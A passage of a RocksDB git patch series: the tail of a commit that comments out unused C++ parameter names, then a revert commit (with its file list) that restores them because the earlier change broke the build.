bool /*prefetch_index_and_filter_in_cache*/) const { return Status::NotSupported(); } virtual TableBuilder* NewTableBuilder( - const TableBuilderOptions& table_builder_options, - uint32_t column_family_id, WritableFileWriter* file) const { + const TableBuilderOptions& /*table_builder_options*/, + uint32_t /*column_family_id*/, WritableFileWriter* /*file*/) const { return nullptr; } - virtual Status SanitizeOptions(const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const { + virtual Status SanitizeOptions(const DBOptions& /*db_opts*/, + const ColumnFamilyOptions& /*cf_opts*/) const { return Status::NotSupported(); } @@ -129,15 +129,15 @@ class DummyMergeOperator : public MergeOperator { DummyMergeOperator() {} virtual ~DummyMergeOperator() {} - virtual bool FullMergeV2(const MergeOperationInput& merge_in, - MergeOperationOutput* merge_out) const override { + virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, + MergeOperationOutput* /*merge_out*/) const override { return false; } - virtual bool PartialMergeMulti(const Slice& key, - const std::deque<Slice>& operand_list, - std::string* new_value, - Logger* logger) const override { + virtual bool PartialMergeMulti(const Slice& /*key*/, + const std::deque<Slice>& /*operand_list*/, + std::string* /*new_value*/, + Logger* /*logger*/) const override { return false; } @@ -156,10 +156,10 @@ class DummySliceTransform : public SliceTransform { virtual Slice Transform(const Slice& src) const { return src; } // determine whether this is a valid src upon the function applies - virtual bool InDomain(const Slice& src) const { return false; } + virtual bool InDomain(const Slice& /*src*/) const { return false; } // determine whether dst=Transform(src) for some src - virtual bool InRange(const Slice& dst) const { return false; } + virtual bool InRange(const Slice& /*dst*/) const { return false; } }; } // namespace diff --git a/utilities/persistent_cache/block_cache_tier_file.cc b/utilities/persistent_cache/block_cache_tier_file.cc index 85e0610b7e4..fac8d75e29a 100644 --- a/utilities/persistent_cache/block_cache_tier_file.cc +++ b/utilities/persistent_cache/block_cache_tier_file.cc @@ -277,7 +277,7 @@ WriteableCacheFile::~WriteableCacheFile() { ClearBuffers(); } -bool WriteableCacheFile::Create(const bool enable_direct_writes, +bool WriteableCacheFile::Create(const bool /*enable_direct_writes*/, const bool enable_direct_reads) { WriteLock _(&rwlock_); diff --git a/utilities/persistent_cache/block_cache_tier_file.h b/utilities/persistent_cache/block_cache_tier_file.h index 3922136d67e..ef5dbab0408 100644 --- a/utilities/persistent_cache/block_cache_tier_file.h +++ b/utilities/persistent_cache/block_cache_tier_file.h @@ -103,13 +103,15 @@ class BlockCacheFile : public LRUElement<BlockCacheFile> { virtual ~BlockCacheFile() {} // append key/value to file and return LBA locator to user - virtual bool Append(const Slice& key, const Slice& val, LBA* const lba) { + virtual bool Append(const Slice& /*key*/, const Slice& /*val*/, + LBA* const /*lba*/) { assert(!"not implemented"); return false; } // read from the record locator (LBA) and return key, value and status - virtual bool Read(const LBA& lba, Slice* key, Slice* block, char* scratch) { + virtual bool Read(const LBA& /*lba*/, Slice* /*key*/, Slice* /*block*/, + char* /*scratch*/) { assert(!"not implemented"); return false; } diff --git a/utilities/persistent_cache/hash_table_test.cc b/utilities/persistent_cache/hash_table_test.cc index 1a6df4e6144..6fe5a596545 100644 ---
a/utilities/persistent_cache/hash_table_test.cc +++ b/utilities/persistent_cache/hash_table_test.cc @@ -43,7 +43,7 @@ struct HashTableTest : public testing::Test { } }; - static void ClearNode(Node node) {} + static void ClearNode(Node /*node*/) {} HashTable<Node, Hash, Equal> map_; }; @@ -73,7 +73,7 @@ struct EvictableHashTableTest : public testing::Test { } }; - static void ClearNode(Node* node) {} + static void ClearNode(Node* /*node*/) {} EvictableHashTable<Node, Hash, Equal> map_; }; diff --git a/utilities/persistent_cache/persistent_cache_test.h b/utilities/persistent_cache/persistent_cache_test.h index 77fd172ba08..37e842f2e2a 100644 --- a/utilities/persistent_cache/persistent_cache_test.h +++ b/utilities/persistent_cache/persistent_cache_test.h @@ -233,8 +233,8 @@ class PersistentCacheDBTest : public DBTestBase { // insert data to table void Insert(const Options& options, - const BlockBasedTableOptions& table_options, const int num_iter, - std::vector<std::string>* values) { + const BlockBasedTableOptions& /*table_options*/, + const int num_iter, std::vector<std::string>* values) { CreateAndReopenWithCF({"pikachu"}, options); // default column family doesn't have block cache Options no_block_cache_opts; diff --git a/utilities/persistent_cache/persistent_cache_tier.cc b/utilities/persistent_cache/persistent_cache_tier.cc index 0f500e87127..732762a1652 100644 --- a/utilities/persistent_cache/persistent_cache_tier.cc +++ b/utilities/persistent_cache/persistent_cache_tier.cc @@ -75,12 +75,12 @@ Status PersistentCacheTier::Close() { return Status::OK(); } -bool PersistentCacheTier::Reserve(const size_t size) { +bool PersistentCacheTier::Reserve(const size_t /*size*/) { // default implementation is a pass through return true; } -bool PersistentCacheTier::Erase(const Slice& key) { +bool PersistentCacheTier::Erase(const Slice& /*key*/) { // default implementation is a pass through since not all cache tiers might // support erase return true; diff --git a/utilities/persistent_cache/volatile_tier_impl.cc b/utilities/persistent_cache/volatile_tier_impl.cc index d190a210282..177fc916904 100644 --- a/utilities/persistent_cache/volatile_tier_impl.cc +++ b/utilities/persistent_cache/volatile_tier_impl.cc @@ -106,7 +106,7 @@ Status VolatileCacheTier::Lookup(const Slice& page_key, return Status::NotFound("key not found in volatile cache"); } -bool VolatileCacheTier::Erase(const Slice& key) { +bool VolatileCacheTier::Erase(const Slice& /*key*/) { assert(!"not supported"); return true; } diff --git a/utilities/redis/redis_list_iterator.h b/utilities/redis/redis_list_iterator.h index 73907ddf8c4..1c4bc11e590 100644 --- a/utilities/redis/redis_list_iterator.h +++ b/utilities/redis/redis_list_iterator.h @@ -288,7 +288,7 @@ class RedisListIterator { /// Will throw an exception based on the passed-in message. /// This function is guaranteed to STOP THE CONTROL-FLOW. /// (i.e.: you do not have to call "return" after calling ThrowError) - void ThrowError(const char* const msg = NULL) { + void ThrowError(const char* const /*msg*/ = NULL) { // TODO: For now we ignore the msg parameter. This can be expanded later.
throw RedisListException(); } diff --git a/utilities/simulator_cache/sim_cache.cc b/utilities/simulator_cache/sim_cache.cc index 335ac9896d0..6c0adf6a740 100644 --- a/utilities/simulator_cache/sim_cache.cc +++ b/utilities/simulator_cache/sim_cache.cc @@ -43,7 +43,7 @@ class SimCacheImpl : public SimCache { Handle* h = key_only_cache_->Lookup(key); if (h == nullptr) { key_only_cache_->Insert(key, nullptr, charge, - [](const Slice& k, void* v) {}, nullptr, + [](const Slice& /*k*/, void* /*v*/) {}, nullptr, priority); } else { key_only_cache_->Release(h); diff --git a/utilities/simulator_cache/sim_cache_test.cc b/utilities/simulator_cache/sim_cache_test.cc index 01b328c783e..d01cdd5304d 100644 --- a/utilities/simulator_cache/sim_cache_test.cc +++ b/utilities/simulator_cache/sim_cache_test.cc @@ -39,7 +39,7 @@ class SimCacheTest : public DBTestBase { return options; } - void InitTable(const Options& options) { + void InitTable(const Options& /*options*/) { std::string value(kValueSize, 'a'); for (size_t i = 0; i < kNumBlocks * 2; i++) { ASSERT_OK(Put(ToString(i), value.c_str())); diff --git a/utilities/spatialdb/spatial_db.cc b/utilities/spatialdb/spatial_db.cc index 539ddd06ee0..a9b990ee20f 100644 --- a/utilities/spatialdb/spatial_db.cc +++ b/utilities/spatialdb/spatial_db.cc @@ -704,7 +704,7 @@ DBOptions GetDBOptionsFromSpatialDBOptions(const SpatialDBOptions& options) { return db_options; } -ColumnFamilyOptions GetColumnFamilyOptions(const SpatialDBOptions& options, +ColumnFamilyOptions GetColumnFamilyOptions(const SpatialDBOptions& /*options*/, std::shared_ptr<Cache> block_cache) { ColumnFamilyOptions column_family_options; column_family_options.write_buffer_size = 128 * 1024 * 1024; // 128MB diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.cc b/utilities/table_properties_collectors/compact_on_deletion_collector.cc index 304cdfff889..625318609d9 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector.cc +++ b/utilities/table_properties_collectors/compact_on_deletion_collector.cc @@ -39,10 +39,11 @@ void CompactOnDeletionCollector::Reset() { // @params key the user key that is inserted into the table. // @params value the value that is inserted into the table. // @params file_size file size up to now -Status CompactOnDeletionCollector::AddUserKey( - const Slice& key, const Slice& value, - EntryType type, SequenceNumber seq, - uint64_t file_size) { +Status CompactOnDeletionCollector::AddUserKey(const Slice& /*key*/, + const Slice& /*value*/, + EntryType type, + SequenceNumber /*seq*/, + uint64_t /*file_size*/) { if (need_compaction_) { // If the output file already needs to be compacted, skip the check. return Status::OK(); @@ -77,7 +78,7 @@ Status CompactOnDeletionCollector::AddUserKey( TablePropertiesCollector* CompactOnDeletionCollectorFactory::CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context context) { + TablePropertiesCollectorFactory::Context /*context*/) { return new CompactOnDeletionCollector( sliding_window_size_, deletion_trigger_); } diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.h b/utilities/table_properties_collectors/compact_on_deletion_collector.h index bd240e5170d..34cd633659b 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector.h +++ b/utilities/table_properties_collectors/compact_on_deletion_collector.h @@ -60,7 +60,7 @@ class CompactOnDeletionCollector : public TablePropertiesCollector { // for writing the properties block.
// @params properties User will add their collected statistics to // `properties`. - virtual Status Finish(UserCollectedProperties* properties) override { + virtual Status Finish(UserCollectedProperties* /*properties*/) override { Reset(); return Status::OK(); } diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc index 3c946bf414f..eabc2271c48 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc +++ b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc @@ -20,7 +20,7 @@ #include "util/random.h" #include "utilities/table_properties_collectors/compact_on_deletion_collector.h" -int main(int argc, char** argv) { +int main(int /*argc*/, char** /*argv*/) { const int kWindowSizes[] = {1000, 10000, 10000, 127, 128, 129, 255, 256, 257, 2, 10000}; const int kDeletionTriggers[] = diff --git a/utilities/transactions/optimistic_transaction_impl.cc b/utilities/transactions/optimistic_transaction_impl.cc index 5652189bc35..bae0d609f29 100644 --- a/utilities/transactions/optimistic_transaction_impl.cc +++ b/utilities/transactions/optimistic_transaction_impl.cc @@ -133,7 +133,7 @@ Status OptimisticTransactionImpl::CheckTransactionForConflicts(DB* db) { true /* cache_only */); } -Status OptimisticTransactionImpl::SetName(const TransactionName& name) { +Status OptimisticTransactionImpl::SetName(const TransactionName& /*name*/) { return Status::InvalidArgument("Optimistic transactions cannot be named."); } diff --git a/utilities/transactions/optimistic_transaction_impl.h b/utilities/transactions/optimistic_transaction_impl.h index 6baec6962ec..3618c69326e 100644 --- a/utilities/transactions/optimistic_transaction_impl.h +++ b/utilities/transactions/optimistic_transaction_impl.h @@ -67,8 +67,8 @@ class OptimisticTransactionImpl : public TransactionBaseImpl { void Clear() override; - void UnlockGetForUpdate(ColumnFamilyHandle* column_family, - const Slice& key) override { + void UnlockGetForUpdate(ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/) override { // Nothing to unlock. 
} diff --git a/utilities/transactions/transaction_base.h b/utilities/transactions/transaction_base.h index 1514836489e..105da0ab9e2 100644 --- a/utilities/transactions/transaction_base.h +++ b/utilities/transactions/transaction_base.h @@ -165,7 +165,7 @@ class TransactionBaseImpl : public Transaction { WriteBatchWithIndex* GetWriteBatch() override; - virtual void SetLockTimeout(int64_t timeout) override { /* Do nothing */ + virtual void SetLockTimeout(int64_t /*timeout*/) override { /* Do nothing */ } const Snapshot* GetSnapshot() const override { diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index 408b15bcd3d..2e3d69633bf 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -367,12 +367,12 @@ Status TransactionImpl::LockBatch(WriteBatch* batch, } virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + const Slice& /*value*/) override { RecordKey(column_family_id, key); return Status::OK(); } virtual Status MergeCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + const Slice& /*value*/) override { RecordKey(column_family_id, key); return Status::OK(); } diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/transaction_impl.h index 01f8f4b2a2d..79db430e759 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/transaction_impl.h @@ -180,7 +180,7 @@ class TransactionCallback : public WriteCallback { public: explicit TransactionCallback(TransactionImpl* txn) : txn_(txn) {} - Status Callback(DB* db) override { + Status Callback(DB* /*db*/) override { if (txn_->IsExpired()) { return Status::Expired(); } else { diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index ce01388f8a8..7b2f8a3c768 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -211,7 +211,7 @@ TEST_P(TransactionTest, WaitingTxn) { ASSERT_TRUE(txn2); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", [&](void* arg) { + "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", [&](void* /*arg*/) { std::string key; uint32_t cf_id; std::vector<TransactionID> wait = txn2->GetWaitingTxns(&cf_id, &key); @@ -433,7 +433,7 @@ TEST_P(TransactionTest, DeadlockCycleShared) { std::atomic<int32_t> checkpoints(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", - [&](void* arg) { checkpoints.fetch_add(1); }); + [&](void* /*arg*/) { checkpoints.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); // We want the leaf transactions to block and hold everyone back.
@@ -501,7 +501,7 @@ TEST_P(TransactionTest, DeadlockCycle) { std::atomic<int32_t> checkpoints(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", - [&](void* arg) { checkpoints.fetch_add(1); }); + [&](void* /*arg*/) { checkpoints.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); // We want the last transaction in the chain to block and hold everyone @@ -4423,7 +4423,7 @@ TEST_P(TransactionTest, ExpiredTransactionDataRace1) { rocksdb::SyncPoint::GetInstance()->LoadDependency( {{"TransactionTest::ExpirableTransactionDataRace:1"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "TransactionTest::ExpirableTransactionDataRace:1", [&](void* arg) { + "TransactionTest::ExpirableTransactionDataRace:1", [&](void* /*arg*/) { WriteOptions write_options; TransactionOptions txn_options; diff --git a/utilities/ttl/ttl_test.cc b/utilities/ttl/ttl_test.cc index 586d0ce1f6c..7aa411b6183 100644 --- a/utilities/ttl/ttl_test.cc +++ b/utilities/ttl/ttl_test.cc @@ -295,8 +295,8 @@ class TtlTest : public testing::Test { // Keeps key if it is in [kSampleSize_/3, 2*kSampleSize_/3), // Change value if it is in [2*kSampleSize_/3, kSampleSize_) // Eg. kSampleSize_=6. Drop:key0-1...Keep:key2-3...Change:key4-5... - virtual bool Filter(int level, const Slice& key, - const Slice& value, std::string* new_value, + virtual bool Filter(int /*level*/, const Slice& key, const Slice& /*value*/, + std::string* new_value, bool* value_changed) const override { assert(new_value != nullptr); @@ -345,7 +345,7 @@ class TtlTest : public testing::Test { } virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter( - const CompactionFilter::Context& context) override { + const CompactionFilter::Context& /*context*/) override { return std::unique_ptr<CompactionFilter>( new TestFilter(kSampleSize_, kNewValue_)); } diff --git a/utilities/write_batch_with_index/write_batch_with_index_test.cc b/utilities/write_batch_with_index/write_batch_with_index_test.cc index 5b1250a6431..105f7517d29 100644 --- a/utilities/write_batch_with_index/write_batch_with_index_test.cc +++ b/utilities/write_batch_with_index/write_batch_with_index_test.cc @@ -63,7 +63,7 @@ struct TestHandler : public WriteBatch::Handler { seen[column_family_id].push_back(e); return Status::OK(); } - virtual void LogData(const Slice& blob) {} + virtual void LogData(const Slice& /*blob*/) {} virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) { Entry e; e.key = key.ToString(); From 72502cf2270db7323d447cc7a504dbea251d432a Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 21 Jul 2017 18:13:59 -0700 Subject: [PATCH 026/205] Revert "comment out unused parameters" Summary: This reverts the previous commit 1d7048c5985e60be8e356663ec3cb6d020adb44d, which broke the build. Did a `git revert 1d7048c`.
Closes https://github.com/facebook/rocksdb/pull/2627 Differential Revision: D5476473 Pulled By: sagar0 fbshipit-source-id: 4756ff5c0dfc88c17eceb00e02c36176de728d06 --- cache/cache_test.cc | 6 +- cache/clock_cache.cc | 2 +- cache/sharded_cache.cc | 2 +- db/builder.cc | 8 +- db/c.cc | 16 +- db/column_family_test.cc | 51 +++--- db/compact_files_test.cc | 9 +- db/compacted_db_impl.h | 45 +++-- db/compaction_iterator.cc | 2 +- db/compaction_iterator.h | 2 +- db/compaction_iterator_test.cc | 29 ++-- db/compaction_job_stats_test.cc | 10 +- db/compaction_picker.cc | 9 +- db/compaction_picker.h | 26 ++- db/compaction_picker_test.cc | 4 +- db/comparator_db_test.cc | 18 +- db/db_block_cache_test.cc | 2 +- db/db_bloom_filter_test.cc | 4 +- db/db_compaction_filter_test.cc | 48 +++--- db/db_compaction_test.cc | 46 ++--- db/db_dynamic_level_test.cc | 4 +- db/db_flush_test.cc | 4 +- db/db_impl.cc | 27 ++- db/db_impl_compaction_flush.cc | 2 +- db/db_impl_readonly.cc | 2 +- db/db_impl_readonly.h | 59 ++++--- db/db_impl_write.cc | 2 +- db/db_iter_test.cc | 6 +- db/db_iterator_test.cc | 6 +- db/db_memtable_test.cc | 2 +- db/db_properties_test.cc | 12 +- db/db_sst_test.cc | 13 +- db/db_tailing_iter_test.cc | 6 +- db/db_test.cc | 163 +++++++++--------- db/db_test2.cc | 23 +-- db/db_test_util.cc | 11 +- db/db_test_util.h | 2 +- db/db_universal_compaction_test.cc | 50 +++--- db/deletefile_test.cc | 2 +- db/external_sst_file_test.cc | 15 +- db/fault_injection_test.cc | 4 +- db/file_indexer_test.cc | 6 +- db/forward_iterator.cc | 2 +- db/forward_iterator.h | 2 +- db/internal_stats.cc | 117 ++++++------- db/listener_test.cc | 17 +- db/malloc_stats.cc | 2 +- db/manual_compaction_test.cc | 6 +- db/memtable_list.cc | 4 +- db/merge_test.cc | 2 +- db/plain_table_db_test.cc | 2 +- db/prefix_test.cc | 6 +- db/table_cache.cc | 4 +- db/table_properties_collector.cc | 4 +- db/table_properties_collector.h | 2 +- db/table_properties_collector_test.cc | 19 +- db/version_builder.cc | 2 +- db/version_edit.cc | 2 +- db/version_set.cc | 6 +- db/version_set.h | 2 +- db/version_set_test.cc | 4 +- db/wal_manager_test.cc | 2 +- db/write_batch.cc | 6 +- db/write_batch_test.cc | 32 ++-- db/write_callback_test.cc | 6 +- db/write_thread.cc | 3 +- env/env_encryption.cc | 14 +- env/env_hdfs.cc | 10 +- env/env_test.cc | 21 +-- env/io_posix.cc | 4 +- env/io_posix.h | 2 +- env/mock_env.cc | 14 +- hdfs/env_hdfs.h | 101 +++++------ include/rocksdb/cache.h | 3 +- include/rocksdb/compaction_filter.h | 12 +- include/rocksdb/db.h | 2 +- include/rocksdb/env.h | 51 +++--- include/rocksdb/filter_policy.h | 5 +- include/rocksdb/iterator.h | 2 +- include/rocksdb/listener.h | 4 +- include/rocksdb/memtablerep.h | 8 +- include/rocksdb/merge_operator.h | 15 +- include/rocksdb/rate_limiter.h | 2 +- include/rocksdb/slice.h | 2 +- include/rocksdb/slice_transform.h | 4 +- include/rocksdb/statistics.h | 2 +- include/rocksdb/utilities/geo_db.h | 2 +- .../utilities/optimistic_transaction_db.h | 2 +- include/rocksdb/utilities/transaction.h | 6 +- include/rocksdb/wal_filter.h | 18 +- include/rocksdb/write_batch.h | 11 +- memtable/hash_cuckoo_rep.cc | 6 +- memtable/hash_linklist_rep.cc | 14 +- memtable/hash_skiplist_rep.cc | 14 +- memtable/skiplistrep.cc | 2 +- memtable/vectorrep.cc | 6 +- options/options_helper.cc | 2 +- options/options_parser.cc | 2 +- port/port_posix.cc | 2 +- port/stack_trace.cc | 2 +- table/adaptive_table_factory.cc | 2 +- table/adaptive_table_factory.h | 5 +- table/block_based_filter_block.cc | 10 +- table/block_based_table_builder.cc | 6 +- 
table/block_based_table_factory.cc | 3 +- table/block_based_table_reader.cc | 18 +- table/block_test.cc | 2 +- table/cuckoo_table_builder_test.cc | 2 +- table/cuckoo_table_factory.cc | 2 +- table/cuckoo_table_factory.h | 5 +- table/cuckoo_table_reader.cc | 11 +- table/cuckoo_table_reader.h | 2 +- table/cuckoo_table_reader_test.cc | 2 +- table/full_filter_block.cc | 14 +- table/full_filter_block.h | 2 +- table/get_context.cc | 2 +- table/index_builder.h | 4 +- table/internal_iterator.h | 5 +- table/iterator.cc | 8 +- table/mock_table.cc | 16 +- table/mock_table.h | 6 +- table/partitioned_filter_block.cc | 2 +- table/partitioned_filter_block_test.cc | 4 +- table/plain_table_factory.cc | 2 +- table/plain_table_factory.h | 5 +- table/plain_table_key_coding.cc | 2 +- table/plain_table_reader.cc | 10 +- table/sst_file_writer_collectors.h | 6 +- table/table_reader.h | 6 +- table/table_test.cc | 53 +++--- third-party/fbson/FbsonDocument.h | 2 +- tools/db_bench_tool.cc | 16 +- tools/ldb_cmd.cc | 40 ++--- tools/ldb_tool.cc | 2 +- tools/sst_dump_tool.cc | 6 +- util/compression.h | 22 ++- util/delete_scheduler_test.cc | 17 +- util/file_reader_writer_test.cc | 36 ++-- util/slice.cc | 8 +- util/testutil.cc | 6 +- util/testutil.h | 74 ++++---- util/thread_local_test.cc | 2 +- utilities/backupable/backupable_db.cc | 2 +- utilities/backupable/backupable_db_test.cc | 11 +- utilities/blob_db/blob_db.h | 6 +- utilities/blob_db/blob_db_impl.cc | 13 +- utilities/blob_db/blob_log_reader.cc | 2 +- utilities/checkpoint/checkpoint_impl.cc | 4 +- utilities/checkpoint/checkpoint_test.cc | 2 +- utilities/col_buf_decoder.h | 2 +- .../remove_emptyvalue_compactionfilter.cc | 11 +- utilities/document/document_db.cc | 21 ++- utilities/merge_operators/max.cc | 8 +- utilities/merge_operators/put.cc | 27 +-- .../string_append/stringappend.cc | 8 +- .../string_append/stringappend2.cc | 8 +- utilities/merge_operators/uint64add.cc | 6 +- utilities/object_registry_test.cc | 13 +- utilities/options/options_util_test.cc | 34 ++-- .../persistent_cache/block_cache_tier_file.cc | 2 +- .../persistent_cache/block_cache_tier_file.h | 6 +- utilities/persistent_cache/hash_table_test.cc | 4 +- .../persistent_cache/persistent_cache_test.h | 4 +- .../persistent_cache/persistent_cache_tier.cc | 4 +- .../persistent_cache/volatile_tier_impl.cc | 2 +- utilities/redis/redis_list_iterator.h | 2 +- utilities/simulator_cache/sim_cache.cc | 2 +- utilities/simulator_cache/sim_cache_test.cc | 2 +- utilities/spatialdb/spatial_db.cc | 2 +- .../compact_on_deletion_collector.cc | 11 +- .../compact_on_deletion_collector.h | 2 +- .../compact_on_deletion_collector_test.cc | 2 +- .../optimistic_transaction_impl.cc | 2 +- .../optimistic_transaction_impl.h | 4 +- utilities/transactions/transaction_base.h | 2 +- utilities/transactions/transaction_impl.cc | 4 +- utilities/transactions/transaction_impl.h | 2 +- utilities/transactions/transaction_test.cc | 8 +- utilities/ttl/ttl_test.cc | 6 +- .../write_batch_with_index_test.cc | 2 +- 180 files changed, 1006 insertions(+), 1076 deletions(-) diff --git a/cache/cache_test.cc b/cache/cache_test.cc index 55f9cc6bb63..8e241226d9c 100644 --- a/cache/cache_test.cc +++ b/cache/cache_test.cc @@ -40,9 +40,9 @@ static int DecodeValue(void* v) { const std::string kLRU = "lru"; const std::string kClock = "clock"; -void dumbDeleter(const Slice& /*key*/, void* /*value*/) {} +void dumbDeleter(const Slice& key, void* value) {} -void eraseDeleter(const Slice& /*key*/, void* value) { +void eraseDeleter(const Slice& key, void* value) { 
Cache* cache = reinterpret_cast<Cache*>(value); cache->Erase("foo"); } @@ -470,7 +470,7 @@ class Value { }; namespace { -void deleter(const Slice& /*key*/, void* value) { +void deleter(const Slice& key, void* value) { delete static_cast<Value*>(value); } } // namespace diff --git a/cache/clock_cache.cc b/cache/clock_cache.cc index d5b32f82fe5..db9d1438e22 100644 --- a/cache/clock_cache.cc +++ b/cache/clock_cache.cc @@ -581,7 +581,7 @@ Status ClockCacheShard::Insert(const Slice& key, uint32_t hash, void* value, size_t charge, void (*deleter)(const Slice& key, void* value), Cache::Handle** out_handle, - Cache::Priority /*priority*/) { + Cache::Priority priority) { CleanupContext context; HashTable::accessor accessor; char* key_data = new char[key.size()]; diff --git a/cache/sharded_cache.cc b/cache/sharded_cache.cc index 6a0a2228211..9bdea3a08e1 100644 --- a/cache/sharded_cache.cc +++ b/cache/sharded_cache.cc @@ -53,7 +53,7 @@ Status ShardedCache::Insert(const Slice& key, void* value, size_t charge, ->Insert(key, hash, value, charge, deleter, handle, priority); } -Cache::Handle* ShardedCache::Lookup(const Slice& key, Statistics* /*stats*/) { +Cache::Handle* ShardedCache::Lookup(const Slice& key, Statistics* stats) { uint32_t hash = HashSlice(key); return GetShard(Shard(hash))->Lookup(key, hash); } diff --git a/db/builder.cc b/db/builder.cc index 6c68e7c4052..6f973fdbd5b 100644 --- a/db/builder.cc +++ b/db/builder.cc @@ -61,10 +61,10 @@ TableBuilder* NewTableBuilder( Status BuildTable( const std::string& dbname, Env* env, const ImmutableCFOptions& ioptions, - const MutableCFOptions& /*mutable_cf_options*/, - const EnvOptions& env_options, TableCache* table_cache, - InternalIterator* iter, std::unique_ptr<InternalIterator> range_del_iter, - FileMetaData* meta, const InternalKeyComparator& internal_comparator, + const MutableCFOptions& mutable_cf_options, const EnvOptions& env_options, + TableCache* table_cache, InternalIterator* iter, + std::unique_ptr<InternalIterator> range_del_iter, FileMetaData* meta, + const InternalKeyComparator& internal_comparator, const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>* int_tbl_prop_collector_factories, uint32_t column_family_id, const std::string& column_family_name, diff --git a/db/c.cc b/db/c.cc index a09d014ec1e..441ffade3b6 100644 --- a/db/c.cc +++ b/db/c.cc @@ -240,7 +240,7 @@ struct rocksdb_comparator_t : public Comparator { // No-ops since the C binding does not support key shortening methods.
virtual void FindShortestSeparator(std::string*, const Slice&) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; struct rocksdb_filterpolicy_t : public FilterPolicy { @@ -355,7 +355,7 @@ struct rocksdb_mergeoperator_t : public MergeOperator { virtual bool PartialMergeMulti(const Slice& key, const std::deque<Slice>& operand_list, std::string* new_value, - Logger* /*logger*/) const override { + Logger* logger) const override { size_t operand_count = operand_list.size(); std::vector<const char*> operand_pointers(operand_count); std::vector<size_t> operand_sizes(operand_count); @@ -2106,8 +2106,8 @@ void rocksdb_options_set_level0_stop_writes_trigger( opt->rep.level0_stop_writes_trigger = n; } -void rocksdb_options_set_max_mem_compaction_level(rocksdb_options_t* /*opt*/, - int /*n*/) {} +void rocksdb_options_set_max_mem_compaction_level(rocksdb_options_t* opt, + int n) {} void rocksdb_options_set_wal_recovery_mode(rocksdb_options_t* opt,int mode) { opt->rep.wal_recovery_mode = static_cast<WALRecoveryMode>(mode); @@ -2171,8 +2171,8 @@ void rocksdb_options_set_manifest_preallocation_size( } // noop -void rocksdb_options_set_purge_redundant_kvs_while_flush( - rocksdb_options_t* /*opt*/, unsigned char /*v*/) {} +void rocksdb_options_set_purge_redundant_kvs_while_flush(rocksdb_options_t* opt, + unsigned char v) {} void rocksdb_options_set_use_direct_reads(rocksdb_options_t* opt, unsigned char v) { @@ -2332,7 +2332,7 @@ void rocksdb_options_set_table_cache_numshardbits( } void rocksdb_options_set_table_cache_remove_scan_count_limit( - rocksdb_options_t* /*opt*/, int /*v*/) { + rocksdb_options_t* opt, int v) { // this option is deprecated } @@ -2836,7 +2836,7 @@ rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create( rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create_with_comparator( const rocksdb_envoptions_t* env, const rocksdb_options_t* io_options, - const rocksdb_comparator_t* /*comparator*/) { + const rocksdb_comparator_t* comparator) { rocksdb_sstfilewriter_t* writer = new rocksdb_sstfilewriter_t; writer->rep = new SstFileWriter(env->rep, io_options->rep); return writer; diff --git a/db/column_family_test.cc b/db/column_family_test.cc index 440fc9930a3..88786d469d5 100644 --- a/db/column_family_test.cc +++ b/db/column_family_test.cc @@ -1168,14 +1168,13 @@ TEST_F(ColumnFamilyTest, MemtableNotSupportSnapshot) { #endif // !ROCKSDB_LITE class TestComparator : public Comparator { - int Compare(const rocksdb::Slice& /*a*/, - const rocksdb::Slice& /*b*/) const override { + int Compare(const rocksdb::Slice& a, const rocksdb::Slice& b) const override { return 0; } const char* Name() const override { return "Test"; } - void FindShortestSeparator(std::string* /*start*/, - const rocksdb::Slice& /*limit*/) const override {} - void FindShortSuccessor(std::string* /*key*/) const override {} + void FindShortestSeparator(std::string* start, + const rocksdb::Slice& limit) const override {} + void FindShortSuccessor(std::string* key) const override {} }; static TestComparator third_comparator; @@ -1347,7 +1346,7 @@ TEST_F(ColumnFamilyTest, MultipleManualCompactions) { {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:5"}, {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) {
